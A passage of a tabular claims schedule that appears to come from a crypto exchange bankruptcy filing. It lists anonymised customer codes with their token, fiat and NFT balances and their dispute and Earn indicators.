| 07360337 | | BTC[.00020387], USD[0.00] | | |
| 07360338 | | CUSDT[1], DOGE[1], USD[10.00] | | |
| 07360339 | | USD[10.00] | | |
| 07360340 | | USD[10.00] | | |
| 07360341 | | USD[10.00] | | |
| 07360342 | | BRZ[1], CUSDT[1], USD[0.51] | | |
| 07360344 | | USD[10.00] | | |
| 07360345 | | USD[10.00] | | |
| 07360346 | | CUSDT[1], DOGE[1], USD[0.00] | Yes | |
| 07360347 | | BRZ[2], CUSDT[3], DOGE[2], TRX[2], USD[0.00], USDT[2.21719434] | Yes | |
| 07360349 | | DOGE[0], GRT[0], SUSHI[0], TRX[1], USD[0.00] | | |
| 07360350 | | USD[10.00] | | |
| 07360351 | | USD[10.00] | | |
| 07360352 | | USD[10.00] | | |
| 07360353 | | USD[10.00] | | |
| 07360354 | | BRZ[2], BTC[.00000094], CUSDT[18], DOGE[5.00744977], GRT[3.12202309], SOL[0], USD[1.08], USDT[0.00082447] | Yes | |
| 07360355 | | BTC[0], DAI[0], DOGE[3.89500171], LINK[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07360356 | | USD[10.00] | | |
| 07360357 | | USD[10.00] | | |
| 07360358 | | USD[11.05] | Yes | |
| 07360359 | | DOGE[3.000548], ETH[0], ETHW[0], GRT[0], TRX[0], USD[0.00] | Yes | |
| 07360360 | | BRZ[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07360361 | | USD[0.00] | | |
| 07360362 | | AVAX[4.62947032], BTC[.00266916], CUSDT[16], DOGE[10279.69990978], ETH[.06312695], ETHW[.06234436], GRT[437.03422024], MATIC[124.22114546], SHIB[9417273.18993867], SOL[2.79957494], TRX[1], USD[0.01] | Yes | |
| 07360364 | | DOGE[1.00002772], USD[0.42] | | |
| 07360365 | | USD[10.00] | | |
| 07360366 | | USD[10.00] | | |
| 07360368 | | USD[10.00] | | |
| 07360369 | | CUSDT[.00000094], USD[0.00] | | |
| 07360370 | | BRZ[1], CUSDT[4], TRX[1], USD[0.01] | | |
| 07360371 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07360372 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07360373 | | USD[10.00] | | |
| 07360374 | | USD[0.00] | | |
| 07360375 | | DOGE[44.955], USD[0.02] | | |
| 07360376 | | DOGE[1], USD[0.00] | Yes | |
| 07360377 | | DOGE[1], USD[0.00] | | |
| 07360378 | | USD[10.00] | | |
| 07360379 | | CUSDT[2], USD[0.00] | | |
| 07360380 | | USD[10.96] | Yes | |
| 07360381 | | USD[10.00] | | |
| 07360383 | | LTC[0], TRX[2.43968408], USD[0.00] | | |
| 07360384 | | USD[10.00] | | |
| 07360385 | | USD[10.00] | | |
| 07360386 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.01] | | |
| 07360387 | | USD[10.00] | | |
| 07360388 | | USD[10.00] | | |
| 07360389 | | CUSDT[1], DOGE[225.25879991], USD[0.00] | | |
| 07360390 | | USD[10.00] | | |
| 07360392 | | TRX[1], USD[1.87], USDT[0] | | |
| 07360394 | | USD[10.00] | | |
| 07360395 | | BRZ[0], DOGE[0], ETH[0], TRX[0], USD[0.14] | Yes | |
| 07360396 | | USD[10.00] | | |
| 07360397 | | BTC[.000031], SOL[.63], SUSHI[.3236], USD[1.12] | | |
| 07360398 | | BRZ[2], CUSDT[2], DOGE[1], TRX[3], USD[0.00], USDT[1] | | |
| 07360399 | | DOGE[1], ETH[2.18232508], ETHW[2.1814085], USD[3759.33], USDT[0] | Yes | |
| 07360401 | | USD[10.00] | | |
| 07360402 | | DOGE[1.00001388], USD[22.56] | | |
| 07360404 | | DOGE[1], USD[0.00] | Yes | |
| 07360407 | | USD[10.00] | | |
| 07360408 | | NFT (535871830078777593/Imola Ticket Stub #1079)[1], USD[1.00], USDT[.004] | | |
| 07360409 | | BRZ[0], USD[0.00] | | |
| 07360410 | | USD[10.00] | | |
| 07360411 | | USD[10.00] | | |
| 07360412 | | CUSDT[1], ETH[0], GRT[1.00498957], MATIC[.14598695], TRX[1], USD[0.00] | Yes | |
| 07360413 | | USD[10.00] | | |
| 07360414 | | DOGE[168.37363861], USD[0.00] | | |
| 07360416 | | USD[10.00] | | |
| 07360417 | | SHIB[5], USD[420.03] | Yes | |
| 07360418 | | DOGE[574.692], USD[0.01] | | |
| 07360419 | | BRZ[1], CUSDT[4], DOGE[5], NFT (353613215758867388/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #50)[1], SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07360420 | | USD[10.00] | | |
| 07360421 | | BRZ[3], CUSDT[1], DOGE[4], GRT[1], LINK[0], SOL[0], TRX[5], USD[0.00] | | |
| 07360422 | | BRZ[2], CUSDT[3], USD[0.00] | Yes | |
| 07360423 | | USD[10.00] | | |
| 07360424 | | DOGE[56.98149933], USD[0.00] | | |
| 07360425 | | CUSDT[1], USD[0.14] | | |
| 07360426 | | USD[10.00] | | |
| 07360427 | | BRZ[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07360428 | | BTC[.00019819], USD[0.00] | | |
| 07360429 | | USD[10.00] | | |
| 07360430 | | DOGE[2], ETH[0], SOL[0], SUSHI[0], USD[0.01] | | |
| 07360432 | | USD[0.00] | | |
| 07360433 | | USD[10.00] | | |
| 07360434 | | BAT[1], BRZ[1], BTC[0], DOGE[3], SHIB[2], SOL[0], USD[0.00], USDT[3.04824676] | | |
| 07360435 | Contingent, Disputed | ETH[0], USD[0.00] | | |
| 07360436 | | DOGE[133.94869363], USD[0.00] | | |
| 07360437 | | BTC[0], USD[0.00] | Yes | |
| 07360438 | | BRZ[1], CUSDT[2], DOGE[235.34693038], USD[0.60] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07360439 | | DOGE[1.00003423], USD[0.00] | | |
| 07360440 | | AAVE[2.02483651], ALGO[1004.71229782], AVAX[6.47772704], BAT[161.91524397], BCH[1.91792978], BRZ[0], BTC[0], CUSDT[2], DAI[0], DOGE[276.05265698], ETH[0.39167731], ETHW[20.41353973], GRT[2731.61110946], KSHIB[6694.89199395], LINK[49.64785994], LTC[6.00598842], MATIC[115.51223188], MKR[.55046604], NEAR[50.22437518], NFT [5750680810733500432/Entrance Voucher #4457[1], SHIB[12286293.26166086], SOL[0], SUSHI[73.02032685], TRX[1287.89459856], UNI[27.48670061], USD[294.33], USDT[0], YFI[0.01978969] | Yes | |
| 07360441 | | CUSDT[1], DOGE[64.66055105], USD[0.19] | Yes | |
| 07360442 | | CUSDT[2], DOGE[1043.02856859], SUSHI[3.64908374], USD[0.00] | | |
| 07360443 | | CUSDT[2], USD[0.00] | Yes | |
| 07360444 | | USD[10.00] | | |
| 07360446 | | USD[0.06] | | |
| 07360447 | | USD[10.00] | | |
| 07360449 | | USD[10.00] | | |
| 07360450 | | USD[0.00] | | |
| 07360451 | | BTC[.00022011], USD[0.00] | | |
| 07360452 | | USD[539.92] | Yes | |
| 07360453 | | USD[0.00] | Yes | |
| 07360454 | | BAT[2.08535424], BRZ[2], BTC[0], CUSDT[3], DOGE[0], SOL[0], TRX[3], USD[0.00], USDT[3.22109638] | Yes | |
| 07360456 | | USD[10.00] | | |
| 07360457 | | DOGE[.27046025], USD[2.15] | | |
| 07360459 | | SHIB[128254.45684237], TRX[1048.11491], USD[0.00] | | |
| 07360460 | | USD[10.00] | | |
| 07360461 | | USD[0.00] | | |
| 07360462 | | USD[10.00] | | |
| 07360463 | | LINK[3.07194468], MATIC[.00025418], SHIB[8.69887364], USD[0.00] | Yes | |
| 07360465 | | CUSDT[6], DOGE[1], USD[0.00] | | |
| 07360466 | | BRZ[4], CUSDT[9], ETH[.00911366], ETHW[.00900422], TRX[3], USD[10.31] | Yes | |
| 07360467 | | USD[0.06] | | |
| 07360468 | | USD[10.00] | | |
| 07360469 | | CUSDT[2], USD[0.00] | Yes | |
| 07360470 | | USD[10.00] | | |
| 07360471 | | USD[10.00] | | |
| 07360472 | | USD[0.00], USDT[0.00000001] | Yes | |
| 07360473 | | USD[10.00] | | |
| 07360474 | | USD[10.00] | | |
| 07360475 | | USD[10.00] | | |
| 07360476 | | USD[10.00] | | |
| 07360477 | | USD[10.00] | | |
| 07360478 | | USD[11.06] | Yes | |
| 07360479 | | DOGE[151.39144635], USD[0.00] | | |
| 07360480 | | USD[10.00] | | |
| 07360481 | | CUSDT[4], DOGE[.71814336], TRX[1], USD[0.01] | | |
| 07360482 | | DOGE[155.38286526], USD[0.00] | Yes | |
| 07360483 | | DOGE[1041.12407821], SHIB[35859.19028662], USD[0.00] | | |
| 07360484 | | USD[10.00] | | |
| 07360485 | | AUD[0.70], BTC[.0027849], CAD[1.25], CUSDT[1], DOGE[774.27011036], ETH[.00033423], ETHW[.00033423], EUR[0.87], GBP[0.37], SHIB[1212437.4740003], SOL[.02795556], USD[0.00] | Yes | |
| 07360486 | | BAT[1], BRZ[3], CUSDT[1], DOGE[2.00339606], TRX[3], USD[10.00] | | |
| 07360487 | | USD[10.00] | | |
| 07360488 | | DOGE[134.22029684], USD[0.00] | | |
| 07360489 | | BRZ[1], CUSDT[3], USD[0.01] | | |
| 07360490 | | USD[10.00] | | |
| 07360493 | | DOGE[17057.20560404], LINK[15.22376291], TRX[5741.65607136], USD[0.00] | Yes | |
| 07360494 | | USD[10.00] | | |
| 07360495 | | SHIB[1], SOL[.02986225], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07360497 | | USD[10.00] | | |
| 07360498 | | ETH[.0055166], ETHW[.0055166], USD[0.00] | | |
| 07360499 | | USD[10.00] | | |
| 07360501 | | USD[10.00] | | |
| 07360502 | | USD[10.00] | | |
| 07360504 | | BRZ[3], BTC[0], CUSDT[7], DOGE[2], GRT[1.00364837], SUSHI[.00291106], TRX[6], USD[0.00], USDT[1.09548991] | Yes | |
| 07360505 | | BRZ[1], CUSDT[1], DOGE[1934.0461958], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07360509 | | USD[10.86] | Yes | |
| 07360510 | | USD[10.00] | | |
| 07360512 | | BRZ[1], DOGE[.00000666], TRX[2], USD[0.00] | | |
| 07360513 | | USD[10.00] | | |
| 07360514 | | USD[10.00] | | |
| 07360515 | | BAT[1741.56048007], BRZ[6], CUSDT[5], GRT[1], TRX[7], USD[0.00], USDT[2] | | |
| 07360516 | | DOGE[.1581611], USD[0.35] | | |
| 07360518 | | CUSDT[1], DOGE[557.49727195], USD[5.00] | | |
| 07360519 | | BTC[.00019641], USD[0.00] | | |
| 07360520 | | USD[10.00] | | |
| 07360521 | | BRZ[1], CUSDT[3], DOGE[262.26997917], USD[0.00] | | |
| 07360522 | | USD[10.00] | | |
| 07360523 | | BRZ[2], DOGE[769.98127228], TRX[2], USD[1.74] | Yes | |
| 07360524 | | BAT[1.01583163], BRZ[2], CUSDT[3], DOGE[1], ETH[0.00000124], ETHW[0.13493051], GRT[1], LINK[.27595867], MATIC[0], SHIB[1], TRX[3], USD[0.00], USDT[0.00009098] | Yes | |
| 07360526 | | USD[10.00] | | |
| 07360529 | | BRZ[1], CUSDT[1], DOGE[305.30989826], SUSHI[1.01057401], TRX[296.33258057], USD[0.00] | | |
| 07360530 | | CUSDT[1], USD[0.01] | | |
| 07360531 | | USD[10.00] | | |
| 07360533 | | USD[10.00] | | |
| 07360535 | | CUSDT[2], DOGE[776.54041708], TRX[5299.16864441], USD[110.15] | Yes | |
| 07360536 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07360537 | | USD[10.00] | | |
| 07360538 | | CUSDT[1], USD[0.41] | Yes | |
| 07360539 | | DOGE[40.89733329], USD[0.00] | | |
| 07360540 | | USD[0.00] | | |
| 07360541 | | USD[10.00] | | |
| 07360544 | | DOGE[64.6663214], USD[12.60] | | |
| 07360545 | | USD[10.00] | | |
| 07360546 | | ETH[.00257658], ETHW[.00254922], USD[0.00] | Yes | |
| 07360547 | | USD[10.00] | | |
| 07360549 | | USD[10.00] | | |
| 07360551 | | CUSDT[16.04012574], DOGE[2172.43104485], TRX[1], USD[21.54] | Yes | |
| 07360552 | | DOGE[2], USD[0.04] | | |
| 07360554 | | BTC[0], ETH[0], USD[10.00] | | |
| 07360555 | | USD[10.00] | | |
| 07360556 | | USD[10.00] | | |
| 07360557 | | USD[10.00] | | |
| 07360558 | | USD[10.00] | | |
| 07360559 | | DOGE[47.72543347], TRX[460.82939961], USD[0.80] | Yes | |
| 07360560 | | BRZ[4], CUSDT[133.05669558], GRT[14.95693485], LTC[.27374941], TRX[1], USD[0.00], USDT[0] | | |
| 07360561 | | USD[10.00] | | |
| 07360562 | | ETH[0], TRX[1], USD[0.00] | | |
| 07360563 | | BRZ[1], DOGE[1], GRT[24.01205606], TRX[1], USD[10.09] | | |
| 07360564 | | USD[10.00] | | |
| 07360565 | | USD[10.00] | | |
| 07360566 | | DOGE[152.14883203], USD[0.00] | Yes | |
| 07360567 | | USD[10.00] | | |
| 07360568 | | BRZ[1], BTC[.00053322], CUSDT[3], DOGE[497.46860874], ETH[.02497563], ETHW[.00121277], SHIB[286355.77944794], USD[0.00] | Yes | |
| 07360569 | | USD[10.00] | | |
| 07360570 | | USD[10.00] | | |
| 07360572 | | USD[10.00] | | |
| 07360573 | | USD[10.00] | | |
| 07360574 | | LTC[0], USD[1.09] | | |
| 07360575 | | CUSDT[1], USD[0.01] | | |
| 07360576 | | USD[10.00] | | |
| 07360577 | | DOGE[4070.38646908], ETH[0], SHIB[1], SOL[.47635892], USD[0.00] | | |
| 07360578 | | CUSDT[1], USD[0.00] | | |
| 07360579 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07360581 | | CUSDT[929.23306698], DOGE[950.78676195], TRX[419.91684994], USD[0.01] | | |
| 07360582 | | USD[10.00] | | |
| 07360584 | | BAT[181.72821698], CUSDT[3], DOGE[4.05213569], GRT[56.72975921], LINK[7.88548865], SOL[22.21729719], SUSHI[6.88695814], TRX[2095.63603531], UNI[10.7132904], USD[0.00], USDT[11.07352579] | Yes | |
| 07360585 | | BAT[24.69990516], TRX[225.98642747], USD[0.00] | Yes | |
| 07360586 | | BRZ[1], CUSDT[472.54347616], DOGE[602.81537965], GRT[27.31274789], KSHIB[472.98416906], MATIC[11.07370649], SHIB[479018.21060965], TRX[.23290018], USD[53.07], USDT[1] | | |
| 07360587 | | CUSDT[8], TRX[5], USD[0.18] | | |
| 07360588 | | BAT[1.01655549], BRZ[1], CUSDT[6], DOGE[409.62267277], GRT[1.00498957], TRX[1], USD[0.01] | Yes | |
| 07360589 | | BRZ[1], CUSDT[1], DOGE[.00000059], USD[0.00] | | |
| 07360591 | | BTC[0], SUSHI[0] | | |
| 07360593 | | USD[10.00] | | |
| 07360594 | | USD[10.00] | | |
| 07360596 | | BAT[0], BCH[0], BRZ[0], BTC[0], DAI[0], DOGE[0], ETH[0], EUR[0.00], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07360598 | | BTC[.00020596], USD[0.00] | | |
| 07360599 | | BAT[0], CUSDT[115.41863143], GRT[0], LINK[0], SOL[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07360600 | | USD[10.00] | | |
| 07360601 | | CUSDT[1], DOGE[1.58962237], TRX[3], USD[0.81] | | |
| 07360602 | | USD[10.97] | Yes | |
| 07360603 | | USD[10.00] | | |
| 07360605 | | USD[10.00] | | |
| 07360606 | | USD[10.00] | | |
| 07360607 | | DOGE[2630.60012624], ETH[.03755235], ETHW[.03755235], TRX[449.02319244], USD[0.00] | | |
| 07360608 | | DOGE[31.88823391], USD[0.00] | | |
| 07360609 | | ETH[2.32298628], ETHW[2.32198941], USD[11.10] | Yes | |
| 07360610 | | USD[10.00] | | |
| 07360611 | | BAT[80.80477156], BRZ[2], CUSDT[4], GRT[4.6706336], KSHIB[1351.29109107], MATIC[124.03096263], SHIB[12903833.59855966], TRX[6522.58248134], USD[488.47], USDT[0] | | |
| 07360613 | | AAVE[.02344458], AUD[13.62], BAT[12.78829664], BCH[.01772415], BRZ[58.54677519], BTC[.00041691], CAD[45.05], CUSDT[541.77921725], DOGE[57.85114835], ETH[.00734287], ETHW[.00734287], EUR[9.38], GBP[7.29], GRT[8.12295308], KSHIB[192.84316763], LINK[.39533100], LTC[.06350535], MATIC[6.66996665], MKR[.00267547], NFT [298846226941483063/5501][1], PAXG[.01323799], SHIB[192877.88758265], SOL[.52414952], SUSHI[.97066435], TRX[375.31998129], UNI[1.40715352], USD[16.95], USDT[2.98381842], YFI[.00025037] | | |
| 07360614 | | BTC[0], USD[0.01] | | |
| 07360615 | | USD[10.00] | | |
| 07360616 | | BAT[8.42357558], CUSDT[1], USD[0.00] | | |
| 07360617 | | BAT[1], BTC[0.00000277], DOGE[1], ETH[0.00000915], ETHW[1.10228461], SHIB[1509470.066804], TRX[1], USD[15.45] | Yes | |
| 07360618 | | DOGE[.468], USD[0.01] | | |
| 07360619 | | BRZ[2], BTC[.01181253], DOGE[1], SHIB[5], UNI[1.93039874], USD[0.00] | Yes | |
| 07360620 | | CUSDT[2], DOGE[250.63034866], USD[10.00] | | |
| 07360621 | | USD[10.00] | | |
| 07360622 | | BAT[1], BRZ[1], CUSDT[1], DOGE[8853.73764863], ETH[1.02618108], ETHW[1.02618108], USD[0.00] | | |
| 07360624 | | BAT[1], BRZ[1], CUSDT[2], DOGE[1], TRX[2], USD[0.01], USDT[1] | | |
| 07360625 | | BAT[0], BRZ[0], BTC[0], DOGE[1], GRT[0], LTC[0], SHIB[8], SOL[0], TRX[0.00548316], USD[0.00] | Yes | |
| 07360626 | | USD[10.00] | | |
| 07360627 | | USD[10.00] | | |
| 07360628 | | TRX[77.59374954], USD[0.00] | | |
| 07360629 | | USD[10.00] | | |
| 07360630 | | USD[10.00] | | |
| 07360631 | | USD[10.00] | | |
| 07360632 | | GRT[.0000495], USD[0.00] | | |
| 07360633 | | BAT[3], BRZ[3], BTC[.00336801], CUSDT[15], DOGE[17623.21543393], ETH[1.87705486], ETHW[1.87705486], LTC[.00003897], TRX[10], USD[0.00] | | |
| 07360634 | | USD[10.00] | | |
| 07360635 | | DOGE[1], USD[0.00] | | |
| 07360636 | | USD[10.00] | | |
| 07360638 | | LINK[.37101935], USD[0.00] | | |
| 07360639 | | CUSDT[0], DOGE[0], USD[0.00] | | |
| 07360640 | | USD[10.00] | | |
| 07360641 | | DOGE[1.17486455], USD[0.00] | | |
| 07360643 | | USD[10.00] | | |
| 07360644 | | BTC[0], CUSDT[2], DOGE[1], TRX[1], USD[0.01] | | |
| 07360645 | | DOGE[541.9366419], TRX[2], USD[0.91] | | |
| 07360646 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07360647 | | USD[0.00] | Yes | |
| 07360648 | | USD[10.00] | | |
| 07360649 | | USD[10.00] | | |
| 07360650 | | DOGE[2], USD[0.00] | | |
| 07360651 | | USD[10.00] | | |
| 07360652 | | CUSDT[3], SHIB[1], TRX[3], USD[0.01] | Yes | |
| 07360653 | | BTC[.00016224], USD[0.00] | | |
| 07360654 | | ETH[0], TRX[1], USD[0.00] | | |
| 07360655 | | USD[10.00] | | |
| 07360656 | | DOGE[81.89813673], USD[5.00] | | |
| 07360658 | | USD[10.00] | | |
| 07360659 | | USD[10.00] | | |
| 07360660 | | DOGE[1316.72412322], SHIB[65451.98776478], TRX[1145.27374557], USD[0.00] | Yes | |
| 07360661 | | USD[0.00] | | |
| 07360663 | | USD[10.00] | | |
| 07360664 | | BRZ[1], DOGE[.00024434], USD[0.45] | | |
| 07360665 | | BAT[1.0165555], BRZ[1], CUSDT[6], DOGE[202.41497627], USD[0.00], USDT[1.10744353] | Yes | |
| 07360666 | | BRZ[1], CUSDT[3], DOGE[1482.88094941], TRX[1], USD[0.00] | Yes | |
| 07360667 | | USD[10.00] | | |
| 07360668 | | USD[10.00] | | |
| 07360669 | | USD[10.00] | | |
| 07360670 | | ETH[.00296226], ETHW[.00296226], USD[15.00] | | |
| 07360671 | | USD[0.00], USDT[0] | | |
| 07360672 | | BTC[.00065308], CUSDT[10], TRX[1], USD[0.00] | Yes | |
| 07360673 | | DOGE[53.7560913], USD[0.00] | | |
| 07360674 | | USD[10.00] | | |
| 07360676 | | USD[0.00] | | |
| 07360677 | | BRZ[2], CUSDT[2], DOGE[3], ETH[0], GRT[0], SOL[0], SUSHI[0], TRX[2], USD[0.00] | | |
| 07360678 | | USD[10.00] | | |
| 07360679 | | USD[10.00] | | |
| 07360680 | | BTC[.00002053], DOGE[.211], USD[0.69], YFI[.000588] | | |
| 07360681 | | TRX[.112], USD[0.77] | | |
| 07360682 | | BRZ[1], CUSDT[1], DOGE[1], ETH[0], TRX[1], USD[0.01] | | |
| 07360683 | | DOGE[2], TRX[190.87591239], USD[0.00] | | |
| 07360684 | | BRZ[3], CUSDT[5], DOGE[2], TRX[1], USD[0.00] | Yes | |
| 07360685 | | BAT[0], DOGE[1], GRT[2], LINK[0], LTC[0], PAXG[0], SOL[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000001] | | |
| 07360686 | | USD[10.00] | | |
| 07360687 | | ETH[.00362367], ETHW[.00362367], USD[0.00] | | |
| 07360688 | | DOGE[4.04182428], USD[0.00] | Yes | |
| 07360689 | | DOGE[124.32224175], USD[10.00] | | |
| 07360690 | | USD[10.00] | | |
| 07360691 | | BRZ[1], CUSDT[2], DOGE[1], USD[0.00] | | |
| 07360692 | | DOGE[505.04140048], USD[0.00] | | |
| 07360693 | | USD[10.00] | | |
| 07360694 | | BAT[1], BRZ[2], CUSDT[8], DOGE[1], GRT[1], TRX[6], USD[0.01] | | |
| 07360695 | | USD[10.90] | Yes | |
| 07360696 | | BRZ[1], BTC[.00019869], CUSDT[4], DOGE[27], ETH[0.58134566], ETHW[0.58134566], TRX[12], USD[183.19] | | |
| 07360697 | | USD[10.00] | | |
| 07360698 | | BRZ[0], DOGE[1792.25185932], GRT[.00765369], SHIB[110129.85843870], TRX[592.75805304], USD[0.00] | Yes | |
| 07360699 | | BAT[3.2237294], BRZ[6.51951614], CUSDT[16], GRT[4.17424456], SOL[3.70661996], TRX[17.2339379], USD[0.01], USDT[5.4305908] | Yes | |
| 07360701 | | BAT[1.0165555], BRZ[1], CUSDT[890.77307839], DOGE[5127.32279545], TRX[86.11778742], USD[0.93], USDT[1.10669542] | Yes | |
| 07360702 | | BTC[0], CUSDT[6], DOGE[0], TRX[1], USD[0.00] | | |
| 07360704 | | GRT[4.17806215], USD[0.00] | | |
| 07360705 | | USD[10.00] | | |
| 07360706 | | USD[10.00] | | |
| 07360707 | | USD[10.00] | | |
| 07360708 | | USD[0.00] | Yes | |
| 07360712 | | BRZ[2], CUSDT[2], DOGE[1], TRX[7], USD[0.00], USDT[2.21723485] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07360713 | | USD[10.00] | | |
| 07360715 | | BCH[0], BTC[0.00028690], DOGE[0], ETH[0], LINK[0], LTC[0], MATIC[0], SHIB[1000], SOL[0.04684380], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[593.02591635], YFI[0] | | |
| 07360716 | | DOGE[22.88], USD[0.34] | | |
| 07360717 | | CUSDT[99.24871086], SHIB[1], USD[16.56] | Yes | |
| 07360718 | | BAT[.16855976], CUSDT[3111.00973221], DOGE[.88927182], TRX[1], USD[1.84] | | |
| 07360719 | | CUSDT[3], TRX[3], USD[0.99] | | |
| 07360720 | | DOGE[1], USD[0.00] | | |
| 07360722 | | TRX[1], USD[0.00] | | |
| 07360723 | | CUSDT[3], DOGE[355.94075367], USD[5.00] | | |
| 07360724 | | USD[10.00] | | |
| 07360725 | | USD[10.00] | | |
| 07360726 | | BRZ[1], CUSDT[3], DOGE[1674.55717962], TRX[2], USD[0.01] | Yes | |
| 07360727 | | CUSDT[2], DOGE[1], MATIC[72.6787458], SUSHI[161.77577592], USD[0.00] | Yes | |
| 07360728 | | USD[10.00] | | |
| 07360729 | | BTC[.0004898], CUSDT[1], DOGE[1], USD[0.00] | Yes | |
| 07360730 | | CUSDT[1], DOGE[1.00000812], TRX[1], USD[0.00] | Yes | |
| 07360731 | | BRZ[1], CUSDT[5], DOGE[981.55818392], KSHIB[151.27100927], SHIB[164236.9241215], TRX[482.71743308], USD[1.20] | Yes | |
| 07360732 | | USD[10.00] | | |
| 07360733 | | BRZ[0], BTC[0], CUSDT[2], DOGE[0], ETH[0], GRT[0], TRX[1], USD[0.00] | | |
| 07360735 | | CUSDT[1], DOGE[1], SUSHI[3.64309018], TRX[1], USD[0.00], USDT[1.70049882] | | |
| 07360736 | | BRZ[0], DOGE[0.00099159], ETH[0], ETHW[0], GRT[0], SUSHI[0], USD[0.00] | | |
| 07360739 | | BTC[0], DOGE[0], SHIB[3], USD[0.00] | Yes | |
| 07360740 | | USD[10.00] | | |
| 07360741 | | CUSDT[1], DOGE[8.29528229], ETHW[.0277956], SHIB[5], TRX[1], USD[0.00], USDT[0.00001947] | Yes | |
| 07360742 | | DOGE[1], ETH[.00000002], ETHW[0], SHIB[8], USD[0.00] | Yes | |
| 07360743 | | USD[0.00] | | |
| 07360744 | | USD[10.00] | | |
| 07360745 | | CUSDT[1], DOGE[1.00075679], USD[0.00], USDT[.00002493] | Yes | |
| 07360746 | | USD[10.00] | | |
| 07360747 | | USD[10.00] | | |
| 07360748 | | BRZ[1], DOGE[1], ETH[0], TRX[1], USD[0.00] | Yes | |
| 07360750 | | BTC[.00049421], CUSDT[4], DOGE[520.69097724], TRX[1], USD[0.01], USDT[0.00029929] | Yes | |
| 07360751 | | BTC[0.00100982], DOGE[.00002029], ETH[.00307187], ETHW[.00303083], SHIB[133158.38413117], SUSHI[.07432394], TRX[10.70940146], USD[0.00] | Yes | |
| 07360752 | | USD[10.00] | | |
| 07360753 | | BTC[0], CUSDT[0], DAI[0], DOGE[1], ETH[0], GRT[0], LINK[0], MATIC[0.00363891], SHIB[2], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000002], YFI[0] | Yes | |
| 07360754 | | CUSDT[2], DOGE[418.1897524], TRX[2], USD[0.00] | | |
| 07360755 | | BRZ[0.00000552], USD[0.00] | | |
| 07360757 | | USD[10.00] | | |
| 07360758 | Contingent, Disputed | DOGE[142.45474889], USD[0.00] | | |
| 07360759 | | USD[10.00] | | |
| 07360760 | | USD[10.00] | | |
| 07360761 | | USD[10.00] | | |
| 07360762 | | TRX[1], USD[0.00] | | |
| 07360763 | | DOGE[14.53551119], USD[0.00] | | |
| 07360764 | | SOL[0], USD[0.00] | | |
| 07360765 | | BTC[.00199325], CUSDT[1888.41065513], DOGE[10803.56080174], ETH[.0954369], ETHW[.0954369], LINK[.46754992], SHIB[86393.08855291], TRX[667.55324774], USD[0.00] | | |
| 07360766 | | USD[10.00] | | |
| 07360767 | | DOGE[33.63333143], USD[0.00] | | |
| 07360768 | | USD[10.00] | | |
| 07360769 | | BRZ[2], BTC[.00116585], CUSDT[2], TRX[2], USD[0.00] | Yes | |
| 07360770 | | BTC[0], SOL[0] | | |
| 07360771 | | USD[10.00] | | |
| 07360772 | | BAT[1], DOGE[1.10611611], CUSDT[2], DOGE[6047.13461085], ETH[2.83994675], ETHW[2.83875397], GRT[93.4222916], SOL[22.82250278], SUSHI[1.11842574], TRX[3], USD[0.01], USDT[0] | Yes | |
| 07360773 | | DOGE[2], GRT[157.7053342], TRX[1], USD[0.00] | Yes | |
| 07360774 | | USD[10.00] | | |
| 07360776 | | USD[10.00] | | |
| 07360777 | | CUSDT[1], DOGE[999.58423592], TRX[1], USD[10.00] | | |
| 07360778 | | DOGE[3021.23890179], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07360779 | | BTC[.00020915], USD[0.00] | | |
| 07360780 | | USD[10.00] | | |
| 07360781 | | CUSDT[1], ETH[.00002429], ETHW[0.00002428], TRX[2], USD[0.00] | Yes | |
| 07360782 | | USD[10.00] | | |
| 07360783 | | CUSDT[1], USD[0.00] | | |
| 07360784 | | AUD[0.00], CUSDT[1], DOGE[6.59439481], SHIB[1], TRX[1], USD[0.01] | Yes | |
| 07360785 | | CUSDT[4], SHIB[2], USD[66.49] | | |
| 07360786 | | DOGE[2.3708879], USD[0.00] | | |
| 07360787 | | DOGE[26.0265787], TRX[1], USD[0.00] | | |
| 07360788 | | USD[10.00] | | |
| 07360789 | | USD[10.00] | | |
| 07360790 | | USD[10.00] | | |
| 07360791 | | USD[10.00] | | |
| 07360792 | | CUSDT[2], DOGE[1.00004096], SOL[.00002624], USD[0.00] | | |
| 07360794 | | CUSDT[5], DOGE[0], GRT[0], SOL[0], USD[0.00] | | |
| 07360796 | | DOGE[516.86475162], USD[0.00] | | |
| 07360798 | | ETH[0], USD[0.00] | Yes | |
